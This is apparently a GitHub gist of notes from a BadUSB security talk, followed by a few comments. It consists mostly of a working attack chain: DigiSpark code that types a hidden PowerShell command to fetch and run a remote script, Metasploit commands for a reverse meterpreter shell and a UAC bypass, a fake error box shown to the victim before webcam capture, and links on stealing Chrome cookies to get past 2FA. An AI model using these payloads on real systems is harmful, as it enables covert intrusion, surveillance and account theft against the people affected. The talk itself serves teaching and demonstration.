Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Notes of Null talk on BadUSB
## Bad USB code
#include "DigiKeyboard.h"
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished
void setup() {
}
void loop() {
digitalWrite(WorkingPin, HIGH);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
digitalWrite(WorkingPin, LOW);
for (;;) {
/*Stops the digispark from running the scipt again*/
}
}
## Metasploit resource file used in demonstration msf-web-delivery.rc
use exploit/multi/script/web_delivery
set Target 2
set LHOST <YOUR_LOCAL_IP_HERE>
set LPORT 6680
set payload windows/x64/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies
exploit -j
## For Popping up an innocuous message box, before starting capturing webcam snaps
DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox
If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this :
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10)
## For VNC
After getting a meterpreter session : run vnc
Then connect with a VNC client on the "local machine"
## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ )
use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
set session 2
set LHOST <YOUR_LOCAL_IP_HERE>
exploit
## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled :
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323
There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md
## State of the art things
Bad USB cables : https://mg.lol/blog/badusb-cables/
O.M.G. cables : https://mg.lol/blog/omg-cable/
## Other Useful Things
DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts
#shamelessSelfPromotion Ahead :p
You can read my other blogs here : https://lud1161.github.io/
and
Here : https://lud1161.wordpress.com/
@vishwaskheriwal

This comment has been minimized.

Copy link

@vishwaskheriwal vishwaskheriwal commented Jun 2, 2019

Sir can you provide a video on this topic.

@LuD1161

This comment has been minimized.

Copy link
Owner Author

@LuD1161 LuD1161 commented Jun 2, 2019

Hello @vishwaskheriwal, sorry to break out to you but the talk wasn't recorded and I am not getting time enough to make a tutorial for the same and put it up online.
Feel free to join for the talk , if and when it happens next.

@LuD1161

This comment has been minimized.

Copy link
Owner Author

@LuD1161 LuD1161 commented Aug 28, 2020

Hello @vishwaskheriwal
this talk is happening again, tomorrow i.e. 29th Aug https://www.meetup.com/OWASP-Bangalore-Chapter/events/272556608/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.